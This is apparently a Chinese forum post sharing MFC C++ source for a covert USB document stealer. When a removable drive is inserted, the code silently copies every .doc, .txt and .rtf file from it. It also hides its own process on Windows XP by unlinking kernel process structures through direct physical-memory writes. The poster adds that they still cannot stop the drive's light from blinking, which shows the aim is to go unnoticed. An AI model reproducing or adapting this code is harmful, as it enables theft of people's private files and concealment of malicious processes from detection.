CString CMyDialog::FindFdisk()
{
CString strdir="";
for(char cc='A';cc<='Z';cc++)
{
strdir.Format("%c:",cc);
if(GetDriveType((LPCTSTR)strdir)==DRIVE_REMOVABLE)//移动盘
return strdir;
}
return strdir="";
}
void CMyDialog::CopyFile(CString dir)
{
CFileFind tempFind;
CString tempFileFind;
tempFileFind.Format("%s\\*.*",dir);
BOOL IsFinded=(BOOL)tempFind.FindFile(tempFileFind);
while(IsFinded)
{
IsFinded=(BOOL)tempFind.FindNextFile();
if(!tempFind.IsDots())
{
CString foundFileName;
foundFileName=tempFind.GetFileName();
if(tempFind.IsDirectory())
{
CString tempDir;
tempDir.Format("%s\\%s",dir,foundFileName);
CopyFile(tempDir);
}
else if(foundFileName.Mid(foundFileName.ReverseFind('.'))==".doc"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".DOC"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".txt"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".TXT"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".rtf"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".rtf")
{
CString tempFileName1,tempFileName2;
tempFileName1.Format("%s\\%s",dir,foundFileName);
tempFileName2.Format("%s\\%s",m_Path,foundFileName);
::CopyFile(tempFileName1,tempFileName2,FALSE);
}
}
}
tempFind.Close();
}
BOOL CMyDialog::OnDeviceChange( UINT nEventType, DWORD dwData )
{
switch (nEventType)
{
case DBT_DEVICEARRIVAL:
m_NewFdisk=FindFdisk();
if(m_NewFdisk!="" && IsRun)
CopyFile(m_NewFdisk);
break;
case DBT_DEVICEREMOVECOMPLETE:
m_NewFdisk="";//盘符清空
break;
}
return TRUE;
}
.h 中
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
afx_msg BOOL OnDeviceChange( UINT nEventType, DWORD dwData );
BOOL HideProcess()//隐藏进程
{
CString version=OSVer();
if(version=="WinXP")
{
static BOOL b_hide = false;
if (!b_hide)
{
b_hide = true;
MyHideProcess();
return true;
}
}
return true;
}
CString OSVer()//判断使用系统
{
OSVERSIONINFOEX os;
::ZeroMemory(&os,sizeof(os));
os.dwOSVersionInfoSize=sizeof(os);
::GetVersionEx(reinterpret_cast<LPOSVERSIONINFO>(&os));
if(os.dwPlatformId==VER_PLATFORM_WIN32_NT && os.dwMajorVersion >=5)
{
if(os.dwMinorVersion!=0)
return "WinXP";
else
return null;
}
return null;
}
BOOL MyHideProcess()
{
if (FALSE == InitNTDLL()) //load ntdll.dll
return FALSE;
if (0 == OpenPhysicalMemory())
return FALSE;
ULONG thread = GetData((PVOID)0xFFDFF124);
ULONG process = GetData(PVOID(thread + 0x44));
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);
CloseHandle(g_hMPM);
CloseNTDLL();
return TRUE;
}
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp)
return 0;
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp)
return FALSE;
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress[VAddr>>22];
if (0 == (PGDE&1))
return 0;
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
return 0;
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
......
隐藏进程的参考网络上应该有。仍旧无法控制U盘灯的闪烁
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
